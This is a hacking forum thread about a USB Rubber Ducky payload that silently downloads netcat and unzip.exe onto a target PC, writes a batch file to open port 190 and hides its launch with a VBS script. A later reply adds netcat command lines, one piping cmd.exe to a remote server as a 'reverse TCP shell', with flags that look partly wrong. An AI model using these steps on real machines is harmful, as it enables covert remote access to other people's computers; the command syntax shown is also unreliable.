Jump to content

Netcat Reverse Shell Invisible Payload Fast


Dtpk
 Share

Recommended Posts

Hello everyone Dtpk here and well I did a thing using Netcat and the usb rubber ducky to make a invisible reverse shell in under a few seconds I didn't time it this time but if I had to guess its about 8 to 9 seconds maybe a little faster first it navigates to userprofile folder then it downloads unzip.exe from either you own drop box or mine if you chose not to change the code then it downloads netcat from its site extracts it from command line using unzip.exe then it makes a batch file to invoke netcat to open a port on 190 then we use vbs script to launch the batch file invisibly. Also I have a video that is a little more in depth if you wish to check that out.

 

Net Cat Script.txt

Link to comment
Share on other sites

  • 2 weeks later...
  • 3 weeks later...
6 hours ago, boba.fett said:

I'm kind newbie on this. This attack can only be use on local networks right? There is any payload to do a reverse shell remotly? Thanks

As of right now its only a attack to be used on local networks unless you know a port is forwarded you could tweak it to use the open port in which case this attack might work remotely but I haven't tried it that way as of yet cause for the most part when ever I need a remote shell i'll be nearby on the same network. :D

Link to comment
Share on other sites

Netcat. The tcp swiss army knife... there is so much you can do with this...

 

You can perform attacks like this with out port forwarding...

 

For example, your web browser can connect to google with out port forwarding. Netcat can do the same

`nc google.COM -p 80`

 

Netcat is used like a pipe... shuv data down one end of the pipe and the other side can see it...

 

nc your.server.com -p 88 -b cmd.exe

If your webserver or your machine is properly port forward then all should work.

 

Reverse Tcp netcat shell.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...